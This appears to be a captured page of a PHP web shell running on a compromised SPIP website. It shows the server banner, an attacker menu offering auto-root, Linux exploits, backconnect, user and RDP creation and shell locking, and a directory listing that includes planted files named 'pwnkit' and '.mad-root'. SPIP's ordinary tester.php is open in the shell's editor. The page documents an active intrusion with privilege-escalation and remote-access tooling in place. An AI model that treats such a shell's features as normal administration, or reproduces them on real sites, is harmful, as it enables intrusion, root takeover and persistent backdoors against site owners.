Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
ecrire /
action /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
activer_plugins.php
2.83
KB
-rw----r--
ajouter_lien.php
1.4
KB
-rw----r--
annuler_job.php
1.03
KB
-rw----r--
api_transmettre.php
2.94
KB
-rw----r--
auth.php
1.46
KB
-rw----r--
calculer_taille_cache.php
2.89
KB
-rw----r--
confirmer_email.php
1.58
KB
-rw----r--
confirmer_inscription.php
2.65
KB
-rw----r--
converser.php
2.89
KB
-rw----r--
cookie.php
3.78
KB
-rw----r--
debloquer_edition.php
1.35
KB
-rw----r--
desinstaller_plugin.php
1.84
KB
-rw----r--
editer_article.php
14.57
KB
-rw----r--
editer_auteur.php
12.37
KB
-rw----r--
editer_liens.php
32.72
KB
-rw----r--
editer_logo.php
8.88
KB
-rw----r--
editer_objet.php
21.4
KB
-rw----r--
editer_rubrique.php
8.64
KB
-rw----r--
etre_webmestre.php
1.81
KB
-rw----r--
forcer_job.php
1.12
KB
-rw----r--
index.php
2
B
-rw----r--
inscrire_auteur.php
12.62
KB
-rw----r--
instituer_langue_objet.php
2.37
KB
-rw----r--
instituer_langue_rubrique.php
1.9
KB
-rw----r--
instituer_objet.php
1.52
KB
-rw----r--
logout.php
4.54
KB
-rw----r--
menu_rubriques.php
7.48
KB
-rw----r--
purger.php
3.03
KB
-rw----r--
purger_queue.php
1.04
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
redirect.php
3.65
KB
-rw----r--
referencer_traduction.php
3.38
KB
-rw----r--
relancer_inscription.php
1.71
KB
-rw----r--
session.php
1.52
KB
-rw----r--
super_cron.php
1.8
KB
-rw----r--
supprimer_lien.php
1.43
KB
-rw----r--
supprimer_rubrique.php
2.4
KB
-rw----r--
tester.php
5.58
KB
-rw----r--
tester_taille.php
4.33
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tester.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Gestion de l'action testant une librairie graphique * * @package SPIP\Core\Configurer */ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Tester les capacités du serveur à utiliser une librairie graphique * * L'argument transmis dans la clé `arg` est le type de librairie parmi * gd2, gd1, netpbm, imagick ou convert * * L'action crée une vignette en utilisant la librairie indiquée puis * redirige sur l'image ainsi créée (sinon sur une image d'echec). **/ function action_tester_dist() { $arg = _request('arg'); $gd_formats = []; $gd_formats_read_gif = ''; // verifier les formats acceptes par GD if ($arg == 'gd1') { // Si GD est installe et php >= 4.0.2 if (function_exists('imagetypes')) { if (imagetypes() & IMG_GIF) { $gd_formats[] = 'gif'; } else { # Attention GD sait lire le gif mais pas forcement l'ecrire if (function_exists('ImageCreateFromGIF')) { $srcImage = @ImageCreateFromGIF(_ROOT_IMG_PACK . 'test.gif'); if ($srcImage) { $gd_formats_read_gif = ',gif'; ImageDestroy($srcImage); } } } if (imagetypes() & IMG_JPG) { $gd_formats[] = 'jpg'; } if (imagetypes() & IMG_PNG) { $gd_formats[] = 'png'; } if (imagetypes() & IMG_WEBP) { $gd_formats[] = 'webp'; } } else { # ancienne methode de detection des formats, qui en plus # est bugguee car elle teste les formats en lecture # alors que la valeur deduite sert a identifier # les formats disponibles en ecriture... (cf. inc_logos) if (function_exists('ImageCreateFromJPEG')) { $srcImage = @ImageCreateFromJPEG(_ROOT_IMG_PACK . 'test.jpg'); if ($srcImage) { $gd_formats[] = 'jpg'; ImageDestroy($srcImage); } } if (function_exists('ImageCreateFromGIF')) { $srcImage = @ImageCreateFromGIF(_ROOT_IMG_PACK . 'test.gif'); if ($srcImage) { $gd_formats[] = 'gif'; ImageDestroy($srcImage); } } if (function_exists('ImageCreateFromPNG')) { $srcImage = @ImageCreateFromPNG(_ROOT_IMG_PACK . 'test.png'); if ($srcImage) { $gd_formats[] = 'png'; ImageDestroy($srcImage); } } if (function_exists('ImageCreateFromWEBP')) { $srcImage = @ImageCreateFromWEBP(_ROOT_IMG_PACK . 'test.webp'); if ($srcImage) { $gd_formats[] = 'webp'; ImageDestroy($srcImage); } } } if (! empty($gd_formats)) { $gd_formats = join(',', $gd_formats); } ecrire_meta('gd_formats_read', $gd_formats . $gd_formats_read_gif); ecrire_meta('gd_formats', $gd_formats); } // verifier les formats netpbm else { if ($arg == 'netpbm') { if (!defined('_PNMSCALE_COMMAND')) { define('_PNMSCALE_COMMAND', 'pnmscale'); } // Securite : mes_options.php peut preciser le chemin absolu if (_PNMSCALE_COMMAND == '') { return; } $netpbm_formats = []; $jpegtopnm_command = str_replace( 'pnmscale', 'jpegtopnm', _PNMSCALE_COMMAND ); $pnmtojpeg_command = str_replace( 'pnmscale', 'pnmtojpeg', _PNMSCALE_COMMAND ); $vignette = _ROOT_IMG_PACK . 'test.jpg'; $dest = _DIR_VAR . 'test-jpg.jpg'; $commande = "$jpegtopnm_command $vignette | " . _PNMSCALE_COMMAND . " -width 10 | $pnmtojpeg_command > $dest"; spip_log($commande); exec($commande); if ($taille = @getimagesize($dest)) { if ($taille[1] == 10) { $netpbm_formats[] = 'jpg'; } } $giftopnm_command = str_replace('pnmscale', 'giftopnm', _PNMSCALE_COMMAND); $pnmtojpeg_command = str_replace('pnmscale', 'pnmtojpeg', _PNMSCALE_COMMAND); $vignette = _ROOT_IMG_PACK . 'test.gif'; $dest = _DIR_VAR . 'test-gif.jpg'; $commande = "$giftopnm_command $vignette | " . _PNMSCALE_COMMAND . " -width 10 | $pnmtojpeg_command > $dest"; spip_log($commande); exec($commande); if ($taille = @getimagesize($dest)) { if ($taille[1] == 10) { $netpbm_formats[] = 'gif'; } } $pngtopnm_command = str_replace('pnmscale', 'pngtopnm', _PNMSCALE_COMMAND); $vignette = _ROOT_IMG_PACK . 'test.png'; $dest = _DIR_VAR . 'test-gif.jpg'; $commande = "$pngtopnm_command $vignette | " . _PNMSCALE_COMMAND . " -width 10 | $pnmtojpeg_command > $dest"; spip_log($commande); exec($commande); if ($taille = @getimagesize($dest)) { if ($taille[1] == 10) { $netpbm_formats[] = 'png'; } } ecrire_meta('netpbm_formats', join(',', $netpbm_formats ?: [])); } } // et maintenant envoyer la vignette de tests if (in_array($arg, ['gd1', 'gd2', 'imagick', 'convert', 'netpbm'])) { include_spip('inc/filtres'); include_spip('inc/filtres_images_mini'); $taille_preview = 150; $image = _image_valeurs_trans(_DIR_IMG_PACK . 'test_image.jpg', "reduire-$taille_preview-$taille_preview", 'jpg'); $image['fichier_dest'] = _DIR_VAR . "test_$arg"; if ( $preview = _image_creer_vignette($image, $taille_preview, $taille_preview, $arg, true) and ($preview['width'] * $preview['height'] > 0) ) { redirige_par_entete($preview['fichier']); } } # image echec redirige_par_entete(chemin_image('echec-reducteur-xx.svg')); }
Close